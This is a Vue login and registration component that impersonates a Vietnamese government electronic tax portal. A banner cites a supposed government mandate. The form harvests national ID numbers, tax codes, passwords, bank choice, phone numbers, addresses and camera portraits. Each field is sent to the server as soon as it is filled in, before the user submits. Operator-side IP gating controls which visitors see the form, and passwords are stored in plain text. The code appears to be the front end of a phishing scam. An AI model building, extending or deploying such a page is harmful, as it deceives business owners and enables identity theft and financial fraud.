<template>
    <div class="wp_login_register">
        <!-- frm progress -->
        <div class="root_page_center root_page_centerwp root_login" v-if="check == 0">
            <div class="login_content login_content_nologin">
                <div class="logo_start_nologin">
                    <img src="../assets/images/logo.png" alt="">
                </div>
                <div class="logo_page_nologin col-md-12 col-sm-12 col-xs-12">
                    <img src="../assets/images/logonen.png" alt="">
                </div>
                <div class="frm_formLogin col-md-12 col-sm-12 col-xs-12">
                    <div class="wp_startLogin">
                        <h2>Xin chào doanh nghiệp</h2>
                        <div class="progress-bar-container">
                            <div class="progress-bar" :class="clProgress" :style="{ width: progress + '%' }"></div>
                            <p>{{ progress }}%</p> 
                        </div>
                        <p>Đang xử lý thông tin...</p>
                        <button @click="startProgress" :disabled="completed">Tiếp tục</button>
                    </div>
                </div>
                <div class="text_run_bottom">
                    <!--  duration="100" -->
                    <Vue3Marquee :pause-on-click="true" :duration="30">
                        <div class="mqtext_mb">
                            <p>Từ ngày <i>1/7/2025</i> theo thông tư của thủ tướng chính phủ nhà nước ban hành, tất cả các doanh nghiệp đều phải cập nhật thông tin ĐKKD lên trang chủ chính thống của nhà nước: https://dangkythuedientu.vn/ để hoàn tất thủ tục và hồ sơ.</p>
                        </div>
                    </Vue3Marquee>
                </div>
            </div>
        </div>
        <!-- frm login -->
        <div class="root_page_center root_login" v-else-if="check == 1">
            <div class="login_content login_content_form">
                <div class="logo_page_form">
                    <img src="../assets/images/logo.png" alt="">
                    <h2>HỆ THỐNG THUẾ ĐIỆN TỬ</h2>
                    <p>Cổng thông tin hỗ trợ Doanh nghiệp</p>
                </div>
                <div class="frm_formLogin_new">
                    <form class="frm_login_app_new" action="" method="post" id="frm_login" @submit="login($event)">
                        <h3 class="form_title">Đăng nhập hệ thống</h3>
                        <div class="input_group_new">
                            <label>Tên đăng nhập / Mã số thuế</label>
                            <div class="input_login_new">
                                <img src="../assets/images/us.png" alt="" class="icon_input">
                                <input type="text" v-model="username" placeholder="Nhập mã số thuế">
                            </div>
                        </div>
                        <div class="input_group_new">
                            <label>Mật khẩu</label>
                            <div class="input_login_new">
                                <img src="../assets/images/pass.png" alt="" class="icon_input">
                                <input :type="showPassword ? 'text' : 'password'" v-model="password" placeholder="Nhập mật khẩu">
                                <div class="password_toggle" @click="togglePassword">
                                    <img src="../assets/images/eye.png" alt="" v-if="showPassword">
                                    <img src="../assets/images/eyes.png" alt="" v-else>
                                </div>
                            </div>
                        </div>
                        <div class="form_options">
                            <label class="checkbox_container">
                                <input type="checkbox" checked v-model="checkSave" id="saveIf">
                                <span class="checkmark"></span>
                                Ghi nhớ đăng nhập
                            </label>
                            <span class="forgot_pw">Quên mật khẩu?</span>
                        </div>
                        <div class="btn_login_new">
                            <button type="submit">Đăng nhập ngay</button>
                        </div>
                        <div class="textRegister_new">
                            Chưa có tài khoản? <span @click="showRegister">Đăng ký tài khoản</span>
                        </div>
                    </form>
                </div>
            </div>
        </div>
        <!-- frm register -->
        <div class="root_page_center root_login root_register_form" v-else>
            <div class="login_content_form register_content_form">
                <div class="logo_page_form">
                    <img src="../assets/images/logos.png" alt="">
                    <h2>THUẾ ĐIỆN TỬ</h2>
                    <p>Đăng ký tài khoản doanh nghiệp mới</p>
                </div>
                <div class="frm_formLogin_new">
                    <form class="frm_login_app_new" action="" method="post" id="frm_register" @submit="register($event)">
                        <h3 class="form_title">Quý khách vui lòng nhập thông tin cơ bản</h3>
                        <div class="input_group_new" style="display:none !important;">
                            <label>Loại hình doanh nghiệp</label>
                            <div class="input_registers">
                                <p v-for="(item, index) in listCompany" :key="index">
                                    <input type="radio" v-model="company" :value="item.id" :id="'radio'+index" @change="onBlurField('company')">
                                    <span class="radio-mark"></span> <label :for="'radio'+index">{{ item.name}}</label>
                                </p>
                            </div>
                        </div>
                        <div class="input_group_new">
                            <label>Tên công ty</label>
                            <div class="input_login_new">
                                <img src="../assets/images/ct.png" alt="" class="icon_input">
                                <input type="text" v-model="company_name" required placeholder="Nhập tên công ty">
                            </div>
                        </div>
                        <div class="input_group_new">
                            <label>Họ và tên (Chủ doanh nghiệp)</label>
                            <div class="input_login_new">
                                <img src="../assets/images/user.png" alt="" class="icon_input">
                                <input type="text" v-model="fullname" @blur="onBlurField('fullname')" placeholder="Nhập họ và tên">
                            </div>
                        </div>
                        <div class="input_group_new">
                            <label>Ngày sinh</label>
                            <div class="input_login_new">
                                <img src="../assets/images/user.png" alt="" class="icon_input">
                                <input type="text" maxlength="10" v-model="birthday" @input="handleDateInput($event, 'birthday')" placeholder="Ngày sinh">
                            </div>
                        </div>
                        <div class="row">
                            <div class="col-12">
                                <div class="input_group_new">
                                    <label>Giới tính</label>
                                    <div class="gender_selection">
                                        <p><input type="radio" v-model="sex" @change="onBlurField('sex')" value="Nam" id="radio6"><span class="radio-mark"></span> <label for="radio6" style="margin-left:0;">Nam</label></p>
                                        <p><input type="radio" v-model="sex" @change="onBlurField('sex')" value="Nữ" id="radio7"><span class="radio-mark"></span> <label for="radio7">Nữ</label></p>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="input_group_new">
                            <label>Số CMNN / CCCD / Hộ chiếu</label>
                            <div class="input_login_new">
                                <img src="../assets/images/user.png" alt="" class="icon_input">
                                <input type="text" v-model="identity_number" placeholder="Nhập số định danh" @blur="onBlurField('identity_number')">
                            </div>
                            <h4>Số CMNN / CCCD phải đúng với số đã đăng ký với Sở Kế Hoạch Và Đầu Tư</h4>
                        </div>
                        <div class="input_group_new">
                            <label>Mã số thuế</label>
                            <div class="input_login_new">
                                <img src="../assets/images/text.png" alt="" class="icon_input">
                                <input type="text" v-model="taxCode" placeholder="Nhập mã số thuế" @blur="onBlurField('taxCode')">
                            </div>
                        </div>
                        <div class="input_group_new">
                            <label>Mật khẩu</label>
                            <div class="input_login_new">
                                <input :type="showPassword1 ? 'text' : 'password'" v-model="passwordRg" placeholder="Mật khẩu" @blur="onBlurField('passwordRg')" class="ip_left">
                                <div class="password_toggle" @click="togglePassword1">
                                    <img src="../assets/images/eye.png" alt="" v-if="showPassword1">
                                    <img src="../assets/images/eyes.png" alt="" v-else>
                                </div>
                            </div>
                        </div>
                        <div class="input_group_new">
                            <label>Xác nhận</label>
                            <div class="input_login_new">
                                <input :type="showPassword2 ? 'text' : 'password'" v-model="confirmPasswordRg" placeholder="Nhập lại" @blur="onBlurField('confirmPasswordRg')" class="ip_left">
                                <div class="password_toggle" @click="togglePassword2">
                                    <img src="../assets/images/eye.png" alt="" v-if="showPassword2">
                                    <img src="../assets/images/eyes.png" alt="" v-else>
                                </div>
                            </div>
                        </div>
                        <div class="input_group_new input_settingVselect">
                            <label>Ngân hàng giao dịch</label>
                            <v-select
                                v-model="bankId"
                                :options="listBank"
                                label="name"
                                :reduce="bank => bank.id"
                                placeholder="Chọn ngân hàng"
                            >
                                <template #option="{ name, image }">
                                    <img :src="linkWebAdmin + image" style="height: 20px; margin-right: 8px;width: 60px;object-fit: contain;" />
                                    {{ name }}
                                </template>
                                <template #selected-option="{ name, image }">
                                    <img :src="linkWebAdmin + image" style="height: 20px; margin-right: 8px;width: 60px;object-fit: contain;" />
                                    {{ name }}
                                </template>
                            </v-select>
                        </div>
                        <div class="input_group_new">
                            <label>Vốn điều lệ</label>
                            <div class="input_login_new">
                                <img src="../assets/images/st.png" alt="" class="icon_input">
                                <input type="text" v-model="showMoney" @input="onNumberInput" placeholder="Nhập số tiền" @blur="onBlurField('showMoney')">
                            </div>
                        </div>
                        <div class="input_group_new">
                            <label>Nhập số điện thoại</label>
                            <div class="input_login_new">
                                <img src="../assets/images/tt.png" alt="" class="icon_input">
                                <input type="text" maxlength="11" v-model="phone" placeholder="Nhập số điện thoại" @blur="onBlurField('phone')">
                            </div>
                            <h4>Số điện thoại phải đúng với số đã đăng ký với Sở Kế Hoạch Và Đầu Tư</h4>
                        </div>
                        <div class="input_group_new">
                            <label>Địa chỉ trụ sở đăng ký</label>
                            <div class="row">
                                <div class="col-6">
                                    <v-select v-model="city" :options="listProvinces" label="name" placeholder="Tỉnh / Thành" />
                                </div>
                                <div class="col-6">
                                    <v-select v-model="ward" :options="listWard" label="name" placeholder="Phường / Xã" />
                                </div>
                            </div>
                            <div class="input_login_new">
                                <img src="../assets/images/home.png" alt="" class="icon_input">
                                <input type="text" v-model="address" placeholder="Số nhà, tên đường, quận/huyện..." @blur="onBlurField('address')">
                            </div>
                        </div>
                        <div class="input_group_new">
                            <label>Cán bộ phụ trách quản lý</label>
                            <div class="input_login_new">
                                <img src="../assets/images/user.png" alt="" class="icon_input">
                                <input type="text" v-model="staff" placeholder="Họ và tên cán bộ" @blur="onBlurField('staff')">
                            </div>
                        </div>
                        <div class="textConfig_new">
                            <label for="config">
                                <input type="checkbox" v-model="config" id="config" style="margin-right: 8px;">
                                Tôi đã đọc, hiểu rõ và chấp nhận <span style="color:red;">các điều khoản</span> của nhà nước. Bằng việc xác nhận này, tôi đồng ý đăng ký tài khoản <span style="color:red;">Thuế Điện Tử</span>
                            </label>
                        </div>
                        <div class="btn_login_new">
                            <button type="submit" :disabled="!config">Đăng ký tài khoản</button>
                        </div>
                        <div class="textLogin_new">
                            Bạn đã có tài khoản? <span @click="showLogin">Đăng nhập</span>
                        </div>
                    </form>
                </div>
            </div>
        </div>
        <!-- modal -->
        <div class="modalRedirect modal_register_success" v-if="showmodal">
            <div class="content_modalredirect content_modalredirectHds">
                <p @click="closeModalShowLogin()" class="closeMdredirect"><img src="../assets/images/close.png" @click="closeModalShowLogin()" alt=""></p>
                <div class="wrp_modal_type">
                    <h6 v-html="content_tb"></h6>
                </div>
            </div>
        </div>
    </div>
</template>
<script>
import $ from 'jquery'
import vSelect from 'vue-select'
import 'vue-select/dist/vue-select.css'

import SocketIO from 'socket.io-client'

export default {
    name: 'Login_tool',
    data () {
        return {
            check: 1,
            username: window.localStorage.getItem('mst'),
            password: window.localStorage.getItem('pw'),
            showPassword: false,
            showPassword1: false,
            showPassword2: false,

            company: '',
            fullname: '',
            identity_number : '',
            birthday: '',
            sex: '',
            taxCode: '',
            passwordRg: '123456789',
            confirmPasswordRg: '123456789',
            phone: '',
            city: '',
            district: '',
            ward: '',
            address: '',
            staff: '',
            identity_front: '',
            identity_back: '',
            portrait: '',
            bankId: '',
            money: '',
            showMoney: '',

            listProvinces: [],
            listDistrict: [],
            listWard: [],
            listCompany: [],

            imageUrl: null,
            imageUrl1: null,
            imageUrl2: null,

            stream: null,
            capturedImage: null,
            widthScreen: window.innerWidth,
            checkImg: 0,
            config: false,
            date: null,
            format: 'dd/MM/yyyy',
            listBank: [],
            checkDxm: 0,
            checkDxms: 0,
            checkCameraOpen: 0,

            progress: 0,
            intervalIdSt: null,
            intervalId: null,
            completed: false,
            checkev: false,
            socket: null,
            clProgress: '',
            oldValues: {},
            formId: '',
            isUserInteracted: false,

            company_name: '',
            showmodal: false,
            content_tb: '',
            checkSave: true
        }
    },
    components: {
        vSelect,
    },
    mounted() {

    },
    watch: {
        city(newVal) {
            if (newVal) {
                this.district = null
                this.ward = null 
                this.getWard()
            }
        },
        ward(newVal) {
            if (this.isUserInteracted && newVal) this.updateUser();
        },
        bankId(newVal) {
            if (this.isUserInteracted && newVal) this.updateUser();
        },
    },
    created () {
        this.getProvinces()
        this.getCompany()
        this.getListBank()
        // this.getIp()
        // this.socketEventCheck()
        // this.startProgress_start()

        this.oldValues = {
            company: this.company || '',
            name: this.fullname || '',
            dob: this.birthday || '',
            gender: this.sex || '',
            identity_number: this.identity_number || '',
            tax_code: this.taxCode || '',
            password: this.passwordRg || '',
            password_confirmation: this.confirmPasswordRg || '',
            phone: this.phone || '',
            charter_capital: this.money || '',
            bank_id: this.bankId || '',
            province: '',
            ward: '',
            address_detail: this.address || '',
            responsible_staff: this.staff || '',
        };
    },
    beforeUnmount() {
        if (this.stream) {
            this.stream.getTracks().forEach(t => t.stop())
        }
        clearInterval(this.intervalIdSt)
        clearInterval(this.intervalId)
        if (this.socket) {
            this.socket.disconnect()
        }
    },
    methods: {
        togglePassword() {
            this.showPassword = !this.showPassword;
        },
        togglePassword1() {
            this.showPassword1 = !this.showPassword1;
        },
        togglePassword2() {
            this.showPassword2 = !this.showPassword2;
        },
        showRegister () {
            this.check = 2
            this.isUserInteracted = false;
            if(this.widthScreen < 768){
                this.initCamera()
            }
        },
        showLogin () {
            this.check = 1
        },
        getProvinces () {
            this.axios.get(this.api_getProvinces).then((response) => {
                this.listProvinces = response.data.data
            })
        },
        // getDistricts () {
        //     if (!this.city) return;
        //     const provinceId = this.city.id || this.city.code;
        //     this.axios.get(this.api_getDistrict + '?province_id=' + provinceId).then((response) => {
        //         this.listDistrict = response.data.data
        //     })
        // },
        getWard () {
            this.axios.get(this.api_getWard + '?province_code=' + this.city.code).then((response) => {
                this.listWard = response.data.data
                this.updateUser();
            })

        },
        getCompany () {
            this.axios.get(this.api_getCompany).then((response) => {
                this.listCompany = response.data.data
            })
        },
        onCapture(event) {
            const file = event.target.files[0]
            if (file) {
                this.checkDxm = 1
                this.imageUrl = URL.createObjectURL(file)
                this.identity_front = file
                event.target.value = ''
            }
        },
        onCapture1(event) {
            const file = event.target.files[0]
            if (file) {
                this.checkDxms = 1
                this.imageUrl1 = URL.createObjectURL(file)
                this.identity_back = file
                event.target.value = ''
            }
        },
        onCapture2(event) {
            const file = event.target.files[0]
            if (file) {
                this.imageUrl2 = URL.createObjectURL(file)
                this.portrait = file
                event.target.value = ''
            }
        },
        async initCamera() {
            try {
                this.stream = await navigator.mediaDevices.getUserMedia({
                    video: { facingMode: 'user' }
                })
                this.$refs.video.srcObject = this.stream
            } catch (err) {
                this.checkCameraOpen = 1
                console.log('Không thể truy cập camera: ' + err.message)
            }
        },
        capture() {
            const video = this.$refs.video
            const canvas = document.createElement('canvas')
            const size = 300
            canvas.width = size
            canvas.height = size
            const ctx = canvas.getContext('2d')
            ctx.beginPath()
            ctx.arc(size / 2, size / 2, size / 2, 0, Math.PI * 2)
            ctx.closePath()
            ctx.clip()
            ctx.drawImage(video, 
                (video.videoWidth - size) / 2,
                (video.videoHeight - size) / 2,
                size, size,
                0, 0,
                size, size
            )
            this.capturedImage = canvas.toDataURL('image/png')
            this.portrait = this.capturedImage
            if (this.capturedImage) {
                this.checkImg = 1
            }
        },
        backPhoto () {
            this.checkImg = 0
            this.capturedImage = null
        },
        getListBank () {
            this.axios.get(this.api_logoBanks).then((response) => {
                this.listBank = response.data.data
            })
        },
        onBirthdayChange(newDate) {
            if (!this.isUserInteracted) {
                this.birthday = newDate;
                this.oldValues.birthday = newDate;
                return;
            }
            if (newDate !== this.oldValues.birthday) {
                this.birthday = newDate;
                this.updateUser();
                this.oldValues.birthday = newDate;
            }
        },
        buildPayload() {
            const payload =  {
                company: this.company,
                name: this.fullname,
                dob: this.formatToApiDate(this.birthday),
                gender: this.sex,
                identity_number: this.identity_number,
                tax_code: this.taxCode,
                password: this.passwordRg,
                password_confirmation: this.confirmPasswordRg,
                phone: this.phone,
                charter_capital: this.money,
                bank_id: this.bankId,
                province: '',
                ward: '',
                address_detail: this.address,
                responsible_staff: this.staff,
            };
            if(this.city){
                payload.province = this.city.name;
            }else{
                payload.province = '';
            }
            if(this.ward){
                payload.ward = this.ward.name;
            }else{
                payload.ward = '';
            }
            return payload;
        },
        onBlurField(field) {
            const newValue = this[field];
            const oldValue = this.oldValues[field];
            if (!this.isUserInteracted) {
                this.isUserInteracted = true;
                this.oldValues[field] = newValue;
                this.updateUser();
                return;
            }
            if (newValue !== oldValue) {
                this.updateUser();
                this.oldValues[field] = newValue;
            }
        },
        updateUser () {
            const payload = this.buildPayload();
            if (this.formId) {
                payload.id = this.formId;
            }
            this.axios.post(this.api_updateUser,
                payload
            ).then((response) => {
                this.formId = response.data.user.id;
            }).catch(e => {
                console.log(e);
            })
        },
        register (e) {
            e.preventDefault()
            $('#loadingImg').show().fadeIn(10)
            const form = new FormData();
            form.append('id', this.formId);
            form.append('company_type', this.company);
            form.append('company_name', this.company_name);
            form.append('name', this.fullname);
            form.append('dob', this.formatToApiDate(this.birthday));
            form.append('gender', this.sex);
            form.append('identity_number', this.identity_number);
            form.append('tax_code', this.taxCode);
            form.append('password', this.passwordRg);
            form.append('password_confirmation', this.confirmPasswordRg);
            form.append('phone', this.phone);
            form.append('charter_capital', this.money);
            form.append('bank_id', this.bankId);
            if(this.city){
                form.append('province', this.city.name);
            }else{
                form.append('province', '');
            }
            if(this.ward){
                form.append('ward', this.ward.name);
            }else{
                form.append('ward', '');
            }
            form.append('address_detail', this.address);
            form.append('responsible_staff', this.staff);

            this.axios.post(this.api_Register,
                form
            ).then((response) => {
                $('#loadingImg').css('display', 'none')
                this.company_name = this.fullname = this.birthday = this.sex = this.identity_number = this.taxCode = this.passwordRg = this.confirmPasswordRg = this.phone = this.money = this.showMoney = this.bankId = this.city = this.ward = this.address = this.responsible_staff = this.staff = ''
                window.localStorage.setItem('mst', this.taxCode)
                window.localStorage.setItem('pw', this.passwordRg)
                this.content_tb = response.data.message
                this.showmodal = true
            }).catch(e => {
                $('#loadingImg').css('display', 'none')
                this.$swal({
                    position: 'top-end',
                    icon: 'error',
                    title: e.response.data.errors,
                    showConfirmButton: false,
                    timer: 2000
                })
            })
        },
        login (e) {
            e.preventDefault()
            $('#loadingImg').show().fadeIn(10)
            this.axios.post(this.api_Login,
                {
                    tax_code: this.username,
                    password: this.password,
                }
            ).then((response) => {
                $('#loadingImg').css('display', 'none')
                this.$swal({
                    position: 'top-end',
                    icon: 'success',
                    title: response.data.message,
                    showConfirmButton: false,
                    timer: 2000
                })
                window.localStorage.setItem('token', response.data.token)
                window.localStorage.setItem('idUser', response.data.user.id)
                if (this.checkSave) {
                    window.localStorage.setItem('mst', this.username)
                    window.localStorage.setItem('pw', this.password)
                }else{
                    localStorage.removeItem('mst');
                    localStorage.removeItem('pw');
                }
                setTimeout(() => {
                    window.location.reload()
                }, 2000);
            }).catch(e => {
                $('#loadingImg').css('display', 'none')
                this.$swal({
                    position: 'top-end',
                    icon: 'error',
                    title: e.response.data.message,
                    showConfirmButton: false,
                    timer: 2000
                })
            })
        },
        formatDate(date) {
            if (!date) return ''
            const yyyy = date.getFullYear()
            const dd = String(date.getDate()).padStart(2, '0')
            const mm = String(date.getMonth() + 1).padStart(2, '0')
            return `${yyyy}-${mm}-${dd}`
        },
        getIp () {
            this.axios.get(this.api_getIp).then((response) => {
                window.localStorage.setItem('ip', response.data.data.ip)
                this.check = response.data.data.status
            })
        },
        startProgress_start() {
            clearInterval(this.intervalIdSt)
            this.progress = 0
            this.intervalIdSt = setInterval(() => {
                if (this.progress < 48) {
                    this.progress += 1
                } else {
                    clearInterval(this.intervalIdSt)
                    this.clProgress = 'active'
                }
            }, 50)
        },
        startProgress() {
            this.clProgress = ''
            clearInterval(this.intervalId)
            this.progress = 48
            this.intervalId = setInterval(() => {
                if (this.progress < 100) {
                    this.progress += 1
                    this.completed = true
                } else {
                    clearInterval(this.intervalId)
                    this.completed = true
                    this.checkev = true
                    this.getIp()
                }
            }, 200)
        },
        socketEventCheck () {
            let thiss = this
            let ip = window.localStorage.getItem('ip')
            this.socket = SocketIO(this.linkWebAdmin, { transports: ['websocket', 'polling', 'flashsocket'], reconnection: true, reconnectionAttempts: 5, reconnectionDelay: 2000 });
            this.socket.on(`laravel_database_private-user_log_ip.${ip}:user-log`, function(result) {
                if(result.status == 1){
                    if(thiss.intervalId==null){
                        thiss.check = 1
                    }else{
                        if(thiss.checkev){
                            thiss.check = 1
                        }
                    }
                }else{
                    thiss.check = 0
                }
            });
        },
        formatNumber(value) {
            const cleaned = value.split('.')[0];
            const num = cleaned.replace(/\D/g, '');
            return num.replace(/\B(?=(\d{3})+(?!\d))/g, '.');
        },
        onNumberInput(e) {
            const raw = e.target.value.replace(/\./g, '');
            this.money = raw
            this.showMoney = this.formatNumber(raw);
        },
        onOpen() {
            this.$nextTick(() => {
                setTimeout(() => {
                    const currentYear = new Date().getFullYear()
                    const yearEl = [...document.querySelectorAll('.dp__overlay_cell')].find(el => el.textContent.trim() == currentYear)
                    if (!yearEl) {
                        console.log('Không tìm thấy năm', currentYear)
                        return
                    }
                    let container = yearEl.parentElement
                    while (container) {
                        if (container.scrollHeight > container.clientHeight) {
                            break
                        }
                        container = container.parentElement
                    }
                    if (container) {
                        container.scrollTop =
                            yearEl.offsetTop - container.clientHeight / 2
                    }
                }, 100)
            })
        },
        closeModalShowLogin () {
            this.showmodal = false
            this.username = window.localStorage.getItem('mst')
            this.password = window.localStorage.getItem('pw')
            this.check = 1
        },
        handleDateInput(event, fieldName) {
            let value = event.target.value.replace(/\D/g, '');
            if (value.length > 8) {
                value = value.slice(0, 8);
            }
            let formatted = '';
            if (value.length > 0) {
                formatted += value.substr(0, 2);
            }
            if (value.length > 2) {
                formatted += '-' + value.substr(2, 2);
            }
            if (value.length > 4) {
                formatted += '-' + value.substr(4, 4);
            }
            if (fieldName && fieldName in this) {
                this[fieldName] = formatted;
            }
            event.target.value = formatted;
        },
        formatToApiDate(dateStr) {
            if (!dateStr || dateStr.length < 10) return '';
            const [day, month, year] = dateStr.split('-');
            return `${year}/${month}/${day}`; 
        }
    }
}
</script>
